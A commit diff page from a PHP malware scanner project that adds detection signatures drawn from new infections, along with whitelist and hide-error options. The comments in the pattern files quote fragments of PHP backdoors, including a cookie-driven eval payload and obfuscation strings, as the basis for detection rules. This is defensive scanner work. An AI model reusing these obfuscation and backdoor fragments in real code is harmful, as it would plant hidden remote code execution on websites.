Pattern updates from new infections

gzipped payload
2026-06-16 12:30:35 +00:00 · 2021-05-27 06:57:08 +02:00 · 2021-05-27 06:57:08 +02:00 · 2021-05-27 06:57:08 +02:00 · 2021-04-01 12:44:15 +02:00 · 2021-02-26 13:27:58 +01:00
4 changed files with 94 additions and 20 deletions
--- a/README.md
+++ b/README.md
@@ -26,6 +26,7 @@ Usage: php scan.php -d <directory>
    -x                   --extra-check        Adds GoogleBot and htaccess to Scan List
    -l                   --follow-symlink     Follow symlinked directories
    -k                   --hide-ok            Hide results with 'OK' status
    -r                   --hide-err           Hide results with 'ER' status
    -w                   --hide-whitelist     Hide results with 'WL' status
    -n                   --no-color           Disable color mode
    -s                   --no-stop            Continue scanning file after first hit
@@ -35,6 +36,7 @@ Usage: php scan.php -d <directory>
    -o                   --output-format      Custom defined output format
    -j                   --wordpress-version  Version of wordpress to get md5 signatures
                         --combined-whitelist Combined whitelist
                         --custom-whitelist   Loads whitelist from specified file and merge with existing
                         --disable-stats      Disable statistics output
 ```
@@ -113,6 +115,22 @@ It is guaranteed that IF 'base64_decode' was present in the plain text code, the
 The presence of 'YmFzZTY0X2RlY29kZ' in a block of code may be because 'ase64_decod' was in the original code.  
 ote the missing edge characters which is due to bit misalignment and character bleed.
 Using as library
 ----------------
 The scan.php perform a check, that it's called by commandline or not, so to use as library use different directory than scan.php it self.
 ```php
 <?php
 require_once '../scan.php';
 $scan = new MalwareScanner();
 $scan->setFlagHideWhitelist(true);
 $scan->setFlagHideOk(true);
 $scan->run('../samples/test');
 ```
 Resources
 ---------
--- a/definitions/patterns_raw.txt
+++ b/definitions/patterns_raw.txt
@@ -108,11 +108,6 @@ SFRUUF9VU0VSX0FHRU5U
 hUVFBfVVNFUl9BR0VOV
 IVFRQX1VTRVJfQUdFTl
 # "file" in base64
 ZmlsZ
 ZpbG
 maWxl
 # "gzinflate" in base64
 Z3ppbmZsYXRl
 d6aW5mbGF0Z
@@ -185,6 +180,7 @@ kZWZpbm
 # Obfuscation related code
 eval("?>
 eval('?>
 "base64_decode"
 ='base'.(32*2).'_de'.'code'
 "p"."r"."e"."g"."_"
@@ -201,11 +197,14 @@ eval(base64_decode(
 $data = base64_decode("
 edoced_46esab
 base=base64_encode
 'b'.'ase6'.'4_e'.'ncode'
 cr"."eat"."e_fun"."cti"."on
 gz'.'inf'.'late
 # fopo.com.ar - free online php obfuscator. It conveniently leaves comments in the code.
 http://www.fopo.com.ar/
@eval("\
 ";eval(
 eval(eval(
 #Malware/Attack specific strings/fingerprints/signatures
 MagelangCyber
@@ -260,6 +259,9 @@ itsoknoproblembro
 tmhapbzcerff
 IndoXploit
 FaisaL Ahmed aka rEd X
 smisbot
 smotherbot
 Indonesian Hacker Rulez
 # WP-VCD Malware https://www.getastra.com/blog/911/how-to-fix-wp-vcd-backdoor-hack-in-wordpress-functions-php/
 wp-vcd
@@ -375,3 +377,13 @@ ZeroByte
 # SEO poisoning control site call
 "http://$xxx
 ?useragent=$botbotbot
 # php://input encoded in base64
 cGhwOi8vaW5wdXQ=
 # backdoor script
 <font color="red">Upload Gagal..</font><br />
 explode('?>',$shell
 # common mobile agent check in SEO poison scripts
 Array("1207", "3gso", "4thp", "501i", "502i", "503i", "504i", "505i", "506i",
--- a/definitions/patterns_re.txt
+++ b/definitions/patterns_re.txt
@@ -117,3 +117,15 @@ create_function\s*\(\s*['"]{2}
 # control concated from cookie at the call
 (\$[a-z]{2,}=urldecode\(\$_COOKIE\['[a-z]{2,}'\]\);){3,}
 # ${$O{18}.$O{7}.$O{24}.$O{2}.$O{50}.$O{8}
 (\$[A-Z]+\{\d+\}\.){3,}
 # comment in variable name $_REQUEST /*YUsrqpbzvXTSa...QpDNTPYQvLSFPCqsSnWNVqPdSIAYaQj*/[
 \$_REQUEST\s*\/\*[A-Za-z]+\*\/\[
 # cookie payload if(isset($_COOKIE)){$p=$_COOKIE;(count($p)==55&&in_array(gettype($p).count($p),$p))?(($p[68]=$p[68].$p[22])&&($p[35]=$p[68]($p[35]))&&($p=$p[35]($p[13],$p[68]($p[45])))&&$p()):$p;}
 \(count\(\$p\)==\d+&&in_array\(gettype\(\$p\)\.count\(\$p\),\$p\)\)
 # gzipped payload post process
 explode\('\|\x01\|\x03\|\x03', gzinflate\(
--- a/scan.php
+++ b/scan.php
@@ -31,6 +31,7 @@ class MalwareScanner
    private $flagChecksum = false;
    private $flagComments = false;
    private $flagHideOk = false;
    private $flagHideErr = false;
    private $flagHideWhitelist = false;
    private $flagNoStop = false;
    private $flagPattern = false;
@@ -41,6 +42,7 @@ class MalwareScanner
    private $flagScanEverything = false;
    private $flagCombinedWhitelist = false;
    private $flagDisableStats = false;
    private $customWhitelist = array();
    private $outputFormat = '';
    private $whitelist = array();
    private $ignore = array();
@@ -190,20 +192,25 @@ class MalwareScanner
        return $list;
    }
-    //Loads the whitelist file
+    /**
-    public function loadWhitelist()
+     * Loads the whitelist files
     */
    public function loadWhitelists()
    {
-        if (!is_file(__DIR__ . '/whitelist.txt')) {
+        $a = array_merge([__DIR__ . '/whitelist.txt'], $this->customWhitelist);
-            return;
+        foreach ($a as $file) {
-        }
+            if (is_file($file)) {
-        $fp = fopen(__DIR__ . '/whitelist.txt', 'r');
+                $fp = fopen($file, 'r');
-        while (!feof($fp)) {
+                while (!feof($fp)) {
-            $line = fgets($fp);
+                    $line = fgets($fp);
-            $this->whitelist[] = substr($line, 0, 32);
+                    $this->whitelist[] = substr($line, 0, 32);
                }
                fclose($fp);
            }
        }
    }
-    private function addWordpressChecksums($wp_version)
+    public function addWordpressChecksums($wp_version)
    {
        $apiurl = 'https://api.wordpress.org/core/checksums/1.0/?version=' . $wp_version;
        $json = json_decode(file_get_contents($apiurl));
@@ -247,6 +254,7 @@ class MalwareScanner
                'wordpress-version:',
                'scan-everything',
                'combined-whitelist',
                'custom-whitelist:',
                'disable-stats'
            )
        );
@@ -298,6 +306,9 @@ class MalwareScanner
        if (isset($options['hide-ok']) || isset($options['k'])) {
            $this->setFlagHideOk(true);
        }
        if (isset($options['hide-err']) || isset($options['r'])) {
            $this->setFlagHideErr(true);
        }
        if (isset($options['hide-whitelist']) || isset($options['w'])) {
            $this->setFlagHideWhitelist(true);
        }
@@ -330,6 +341,13 @@ class MalwareScanner
        if (isset($options['combined-whitelist'])) {
            $this->setFlagCombinedWhitelist(true);
        }
        if (isset($options['custom-whitelist'])) {
            $a = $options['custom-whitelist'];
            if (!is_array($a)) {
                $a = array($a);
            }
            $this->setCustomWhitelist(array_unique($a));
        }
        if (isset($options['disable-stats'])) {
            $this->setFlagDisableStats(true);
        }
@@ -396,6 +414,11 @@ class MalwareScanner
        $this->flagHideOk = $b;
    }
    public function setFlagHideErr($b)
    {
        $this->flagHideErr = $b;
    }
    public function setFlagHideWhitelist($b)
    {
        $this->flagHideWhitelist = $b;
@@ -426,6 +449,11 @@ class MalwareScanner
        $this->flagDisableStats = $b;
    }
    public function setCustomWhitelist($a)
    {
        $this->customWhitelist = $a;
    }
    // @see http://stackoverflow.com/a/13914119
    private function pathMatches($path, $pattern, $ignoreCase = false)
    {
@@ -490,6 +518,9 @@ class MalwareScanner
            $state = 'WL';
            $state_color = $this->ANSI_YELLOW;
        } else {
            if ($this->flagHideErr) {
                return;
            }
            $state = 'ER';
            $state_color = $this->ANSI_RED;
        }
@@ -614,7 +645,7 @@ class MalwareScanner
    {
        $this->initializePatterns();
-        $this->loadWhitelist();
+        $this->loadWhitelists();
        if ($this->flagCombinedWhitelist && !$this->updateCombinedWhitelist()) {
            return false;
@@ -820,6 +851,7 @@ class MalwareScanner
        echo '    -x                   --extra-check        Adds GoogleBot and htaccess to Scan List' . PHP_EOL;
        echo '    -l                   --follow-symlink     Follow symlinked directories' . PHP_EOL;
        echo '    -k                   --hide-ok            Hide results with \'OK\' status' . PHP_EOL;
        echo '    -r                   --hide-err           Hide results with \'ER\' status' . PHP_EOL;
        echo '    -w                   --hide-whitelist     Hide results with \'WL\' status' . PHP_EOL;
        echo '    -n                   --no-color           Disable color mode' . PHP_EOL;
        echo '    -s                   --no-stop            Continue scanning file after first hit' . PHP_EOL;
Author	SHA1	Message	Date
Gabor Gyorvari	43876b337b	Pattern updates from new infections	2021-05-27 06:57:08 +02:00
Gabor Gyorvari	1fad164790	gzipped payload	2021-05-27 06:57:08 +02:00
Gabor Gyorvari	f4d53e89d8	Pattern updates from new infections	2021-05-27 06:57:08 +02:00
Gabor Gyorvari	34ea02323b	New flag to specify custom white list file	2021-04-01 12:44:15 +02:00
Gabor Gyorvari	b74494a4f1	base64 sample for "file" too short and causes false positive	2021-02-26 13:27:58 +01:00
Gabor Gyorvari	9624ec4403	README update with new -r flag	2021-02-24 16:47:13 +01:00
Győrvári Gábor	335b13b7c4	Merge pull request #67 from mitchobrian/master Feature flagHideErr #66	2021-02-24 16:45:34 +01:00
Michael Palmer	78bee49176	https://github.com/scr34m/php-malware-scanner/issues/66	2021-02-24 13:36:10 +01:00
Győrvári Gábor	cc0fdc7a9f	Merge pull request #63 from aldavigdis/patch-1 Adding definitions based on recent code injection	2020-11-17 08:07:52 +01:00
Alda Vigdis Skarphedinsdottir	ec8f9920ba	Adding definitions based on recent code injection	2020-11-17 04:06:03 +01:00
Gabor Gyorvari	5883c68f54	Small example how to use as library, fix #61	2020-10-05 13:34:16 +02:00
Gabor Gyorvari	22b51a1ee3	Change addWordpressChecksums to public, fix #58	2020-10-05 10:59:13 +02:00